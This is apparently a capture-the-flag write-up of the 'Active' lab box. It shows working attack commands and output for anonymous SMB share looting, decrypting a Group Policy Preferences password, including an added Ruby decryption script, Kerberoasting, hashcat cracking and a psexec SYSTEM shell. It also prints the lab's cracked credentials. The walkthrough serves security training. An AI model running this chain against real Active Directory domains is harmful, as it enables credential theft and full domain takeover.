Active is an easy difficulty box. We enumerate SMB shares using null authentication to locate a Groups.xml file. This file contains Group Policy Preferences (GPP) credentials, which we leverage to perform a Kerberoasting attack.

Reconnaissance


Nmap

We scan all TCP ports (-p-) with the default script set (-sC) and version detection (-sV).

┌──(iwo㉿kali)-[~/boxes/active/scans]
└─$ nmap -sCV -p- 10.10.10.100 -oA tcp_sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-23 03:14 CET
Nmap scan report for 10.10.10.100
Host is up (0.067s latency).
Not shown: 65512 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-23 02:17:32Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49166/tcp open  msrpc         Microsoft Windows RPC
49168/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-01-23T02:18:30
|_  start_date: 2025-01-23T02:02:18
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 225.44 seconds

DNS - UDP/TCP 53

We get back a response to a DNS query. Note that the dig command below lacks the @ before the server address, so both lookups actually went to the local resolver (172.16.195.2), which answers NXDOMAIN for active.htb; the zone transfer attempt that follows uses the correct @10.10.10.100 form.

┌──(iwo㉿kali)-[~/boxes/active/scans]
└─$ dig 10.10.10.100 active.htb

; <<>> DiG 9.20.4-3-Debian <<>> 10.10.10.100 active.htb
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 11559
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;10.10.10.100.                  IN      A

;; ANSWER SECTION:
10.10.10.100.           5       IN      A       10.10.10.100

;; Query time: 3 msec
;; SERVER: 172.16.195.2#53(172.16.195.2) (UDP)
;; WHEN: Thu Jan 23 03:29:18 CET 2025
;; MSG SIZE  rcvd: 46

;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 43990
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; MBZ: 0x0005, udp: 1280
; COOKIE: 83dec5c0f075595b010000006791a97e5c66cd42d07379e9 (good)
;; QUESTION SECTION:
;active.htb.                    IN      A

;; AUTHORITY SECTION:
.                       5       IN      SOA     a.root-servers.net. nstld.verisign-grs.com. 2025012201 1800 900 604800 86400

;; Query time: 23 msec
;; SERVER: 172.16.195.2#53(172.16.195.2) (UDP)
;; WHEN: Thu Jan 23 03:29:18 CET 2025
;; MSG SIZE  rcvd: 142

Unfortunately, performing a DNS zone transfer fails.

┌──(iwo㉿kali)-[~/boxes/active/scans]
└─$ dig AXFR @10.10.10.100 active.htb     

; <<>> DiG 9.20.4-3-Debian <<>> AXFR @10.10.10.100 active.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.

SMB - TCP 445

SMB allows null (anonymous) authentication, and we have read access to the Replication share.

┌──(iwo㉿kali)-[~/boxes/active/scans]
└─$ smbclient -N -L \\10.10.10.100   
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Replication     Disk      
        SYSVOL          Disk      Logon server share 
        Users           Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Downloading everything from the Replication share.

smb: \active.htb\> mask ""
smb: \active.htb\> recurse ON
smb: \active.htb\> prompt OFF
smb: \active.htb\> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (0.5 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (13.0 KiloBytes/sec) (average 3.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (2.5 KiloBytes/sec) (average 3.0 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (4.8 KiloBytes/sec) (average 3.3 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (17.6 KiloBytes/sec) (average 5.2 KiloBytes/sec)
smb: \active.htb\> exit
                                                                                                     
┌──(iwo㉿kali)-[~/boxes/active/smb]
└─$ tree                    
.
├── DfsrPrivate
│   ├── ConflictAndDeleted
│   ├── Deleted
│   └── Installing
├── Policies
│   ├── {31B2F340-016D-11D2-945F-00C04FB984F9}
│   │   ├── GPT.INI
│   │   ├── Group Policy
│   │   │   └── GPE.INI
│   │   ├── MACHINE
│   │   │   ├── Microsoft
│   │   │   │   └── Windows NT
│   │   │   │       └── SecEdit
│   │   │   │           └── GptTmpl.inf
│   │   │   ├── Preferences
│   │   │   │   └── Groups
│   │   │   │       └── Groups.xml
│   │   │   └── Registry.pol
│   │   └── USER
│   └── {6AC1786C-016F-11D2-945F-00C04fB984F9}
│       ├── GPT.INI
│       ├── MACHINE
│       │   └── Microsoft
│       │       └── Windows NT
│       │           └── SecEdit
│       │               └── GptTmpl.inf
│       └── USER
└── scripts

22 directories, 7 files

Groups.xml holds a Group Policy Preferences entry for the SVC_TGS user with a cpassword attribute. The value is AES-256 encrypted, but Microsoft published the static AES key on MSDN (in the MS-GPPREF specification), so anyone who can read SYSVOL can decrypt it. We use gpp-decrypt to recover the password for the SVC_TGS user.

┌──(iwo㉿kali)-[~/boxes/active/smb]
└─$ cat Policies/\{31B2F340-016D-11D2-945F-00C04FB984F9\}/MACHINE/Preferences/Groups/Groups.xml 
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
                                                                                                     
┌──(iwo㉿kali)-[~/boxes/active/smb]
└─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
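As an added example (not part of the original writeup, and not the gpp-decrypt tool itself), the same decryption written in Ruby: it scans the Groups.xml text above for cpassword attributes and decrypts each one with the AES-256 key published in MS-GPPREF (all-zero IV, UTF-16LE plaintext). The regex-based attribute extraction and the helper names are my own; the XML sample is the file pulled from the Replication share.

```ruby
require 'openssl'

# Static AES-256 key published by Microsoft in the MS-GPPREF specification.
# Every GPP cpassword in every domain is encrypted with this same key,
# which is why a cpassword in SYSVOL is effectively a cleartext password.
GPP_AES_KEY = ['4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'].pack('H*')

# Decrypt one cpassword value: restore the base64 padding GPP strips,
# AES-256-CBC decrypt with an all-zero IV, then decode the UTF-16LE plaintext.
def decrypt_cpassword(cpassword)
  padded = cpassword + '=' * ((4 - cpassword.length % 4) % 4)
  ciphertext = padded.unpack1('m')
  cipher = OpenSSL::Cipher.new('aes-256-cbc')
  cipher.decrypt
  cipher.key = GPP_AES_KEY
  cipher.iv = "\x00" * 16
  plaintext = cipher.update(ciphertext) + cipher.final # final strips PKCS#7 padding
  plaintext.force_encoding('UTF-16LE').encode('UTF-8')
end

# Pull every (account, cpassword) pair out of a GPP preference XML file.
# Groups.xml is the common case, but Services.xml, ScheduledTasks.xml,
# DataSources.xml, Drives.xml and Printers.xml carry the same attribute
# (under userName, accountName, runAs or username), so an audit of SYSVOL
# should scan all of them, not just Groups.xml.
def find_gpp_credentials(xml)
  xml.scan(/<Properties\b[^>]*>/).filter_map do |props|
    cpass = props[/\bcpassword="([^"]*)"/, 1]
    next if cpass.nil? || cpass.empty? # empty cpassword means no stored password
    user = props[/\b(?:userName|accountName|runAs|username)="([^"]*)"/, 1]
    { user: user, cpassword: cpass, password: decrypt_cpassword(cpass) }
  end
end

# The Groups.xml retrieved from the Replication share, embedded so the script runs offline.
SAMPLE_GROUPS_XML = <<~XML
  <?xml version="1.0" encoding="utf-8"?>
  <Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\\SVC_TGS"/></User>
  </Groups>
XML

if __FILE__ == $PROGRAM_NAME
  find_gpp_credentials(SAMPLE_GROUPS_XML).each do |c|
    puts "#{c[:user]} : #{c[:password]}"
  end
end
```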

From the GptTmpl.inf of the Default Domain Policy (the {31B2F340-...} GUID is the well-known one for that policy) we get the password policy, the Kerberos policy and a registry value (NoLMHash) saying that LM hashes are not stored. LockoutBadCount = 0 means no lockout threshold is set, so we don't have to worry about lockouts.

┌──(iwo㉿kali)-[~/boxes/active/smb]
└─$ cat Policies/\{31B2F340-016D-11D2-945F-00C04FB984F9\}/MACHINE/Microsoft/Windows\ NT/SecEdit/GptTmpl.inf
[Unicode]
Unicode=yes
[System Access]
MinimumPasswordAge = 1
MaximumPasswordAge = 42
MinimumPasswordLength = 7
PasswordComplexity = 1
PasswordHistorySize = 24
LockoutBadCount = 0
RequireLogonToChangePassword = 0
ForceLogoffWhenHourExpire = 0
ClearTextPassword = 0
LSAAnonymousNameLookup = 0
[Kerberos Policy]
MaxTicketAge = 10
MaxRenewAge = 7
MaxServiceAge = 600
MaxClockSkew = 5
TicketValidateClient = 1
[Registry Values]
MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash=4,1
[Version]
signature="$CHICAGO$"
Revision=1

The second file belongs to the Default Domain Controllers Policy: it enforces LDAP server integrity, Netlogon sign/seal and SMB signing, and lists the user rights assigned to various SIDs. Not really interesting in our case. Let's look at what we can achieve with the newly acquired credentials.

┌──(iwo㉿kali)-[~/boxes/active/smb]
└─$ cat Policies/\{6AC1786C-016F-11D2-945F-00C04fB984F9\}/MACHINE/Microsoft/Windows\ NT/SecEdit/GptTmpl.inf 
[Unicode]
Unicode=yes
[Registry Values]
MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\LDAPServerIntegrity=4,1
MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\RequireSignOrSeal=4,1
MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\RequireSecuritySignature=4,1
MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\EnableSecuritySignature=4,1
[Privilege Rights]
SeAssignPrimaryTokenPrivilege = *S-1-5-20,*S-1-5-19
SeAuditPrivilege = *S-1-5-20,*S-1-5-19
SeBackupPrivilege = *S-1-5-32-549,*S-1-5-32-551,*S-1-5-32-544
SeBatchLogonRight = *S-1-5-32-559,*S-1-5-32-551,*S-1-5-32-544
SeChangeNotifyPrivilege = *S-1-5-32-554,*S-1-5-11,*S-1-5-32-544,*S-1-5-20,*S-1-5-19,*S-1-1-0
SeCreatePagefilePrivilege = *S-1-5-32-544
SeDebugPrivilege = *S-1-5-32-544
SeIncreaseBasePriorityPrivilege = *S-1-5-32-544
SeIncreaseQuotaPrivilege = *S-1-5-32-544,*S-1-5-20,*S-1-5-19
SeInteractiveLogonRight = *S-1-5-32-550,*S-1-5-32-549,*S-1-5-32-548,*S-1-5-32-551,*S-1-5-32-544
SeLoadDriverPrivilege = *S-1-5-32-550,*S-1-5-32-544
SeMachineAccountPrivilege = *S-1-5-11
SeNetworkLogonRight = *S-1-5-32-554,*S-1-5-9,*S-1-5-11,*S-1-5-32-544,*S-1-1-0
SeProfileSingleProcessPrivilege = *S-1-5-32-544
SeRemoteShutdownPrivilege = *S-1-5-32-549,*S-1-5-32-544
SeRestorePrivilege = *S-1-5-32-549,*S-1-5-32-551,*S-1-5-32-544
SeSecurityPrivilege = *S-1-5-32-544
SeShutdownPrivilege = *S-1-5-32-550,*S-1-5-32-549,*S-1-5-32-551,*S-1-5-32-544
SeSystemEnvironmentPrivilege = *S-1-5-32-544
SeSystemProfilePrivilege = *S-1-5-80-3139157870-2983391045-3678747466-658725712-1809340420,*S-1-5-32-544
SeSystemTimePrivilege = *S-1-5-32-549,*S-1-5-32-544,*S-1-5-19
SeTakeOwnershipPrivilege = *S-1-5-32-544
SeUndockPrivilege = *S-1-5-32-544
SeEnableDelegationPrivilege = *S-1-5-32-544
[Version]
signature="$CHICAGO$"
Revision=1

With the credentials SVC_TGS:GPPstillStandingStrong2k18 we can read three more shares (NETLOGON, SYSVOL and Users).

┌──(iwo㉿kali)-[~/boxes/active/smb]
└─$ smbmap -H 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18 -d active.htb

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
                                                                                                                             
[+] IP: 10.10.10.100:445        Name: 10.10.10.100              Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        Replication                                             READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share 
        Users                                                   READ ONLY
[*] Closed 1 connection

We continue to extract files from the SMB shares.

┌──(iwo㉿kali)-[~/boxes/active/smb/SVC_TGS]
└─$ smbclient -U active.htb/SVC_TGS --password=GPPstillStandingStrong2k18 \\\\10.10.10.100\\Users
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sat Jul 21 16:39:20 2018
  ..                                 DR        0  Sat Jul 21 16:39:20 2018
  Administrator                       D        0  Mon Jul 16 12:14:21 2018
  All Users                       DHSrn        0  Tue Jul 14 07:06:44 2009
  Default                           DHR        0  Tue Jul 14 08:38:21 2009
  Default User                    DHSrn        0  Tue Jul 14 07:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 06:57:55 2009
  Public                             DR        0  Tue Jul 14 06:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 17:16:32 2018

                5217023 blocks of size 4096. 278842 blocks available
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

<SNIP>
┌──(iwo㉿kali)-[~/boxes/active/smb/SVC_TGS]                                                          
└─$ smbclient -U active.htb/SVC_TGS --password=GPPstillStandingStrong2k18 \\\\10.10.10.100\\SYSVOL   
Try "help" to get a list of possible commands.                                                       
smb: \> mask ""                                                                                      
smb: \> recurse ON                                                                                   
smb: \> prompt OFF                                                                                   
smb: \> mget *

<SNIP>

We retrieve the user flag from those files!

┌──(iwo㉿kali)-[~/boxes/active/smb/SVC_TGS]
└─$ cat SVC_TGS/Desktop/user.txt 
c37c0a**************************

Privilege escalation


Kerberoasting

We have a set of valid domain credentials, which is all that is needed to request TGS tickets for accounts that have an SPN set. Let's perform a Kerberoasting attack.

┌──(iwo㉿kali)-[~/boxes/active/hashes]
└─$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 21:06:40.351723  2025-01-23 03:03:26.780555             



[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$603d7ffa425cafd14449856a8ed749ba$<SNIP>

Cracking a hash

We successfully crack the Administrator's TGS hash with hashcat mode 13100 (Kerberos 5 TGS-REP, etype 23 / RC4-HMAC) against rockyou.txt.

┌──(iwo㉿kali)-[~/boxes/active/hashes]
└─$ hashcat -a 0 -m 13100 administrator.hash /usr/share/wordlists/rockyou.txt

<SNIP>

$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$7028f37607953ce9fd6c9060de4aece5$<SNIP>:Ticketmaster1968

Getting a shell

We use Impacket's psexec.py with the cracked password to get a SYSTEM shell and read the root flag.

┌──(iwo㉿kali)-[~/boxes/active/hashes]
└─$ psexec.py active.htb/administrator@10.10.10.100
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Password:
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file zohPLsud.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service tdxm on 10.10.10.100.....
[*] Starting service tdxm.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
                                                                                                                                                                                
C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
822711**************************

Alternatively, we can skip the shell and fetch the root flag directly from the C$ share with smbclient.

┌──(iwo㉿kali)-[~/boxes/active/hashes]
└─$ smbclient -U active.htb/administrator --password=Ticketmaster1968 \\\\10.10.10.100\\C$
Try "help" to get a list of possible commands.
smb: \> cd Users\Administrator\Desktop
smb: \Users\Administrator\Desktop\> get root.txt
getting file \Users\Administrator\Desktop\root.txt of size 34 as root.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)

We now possess the highest level of privileges and have successfully compromised the entire Active Directory (AD) domain. :D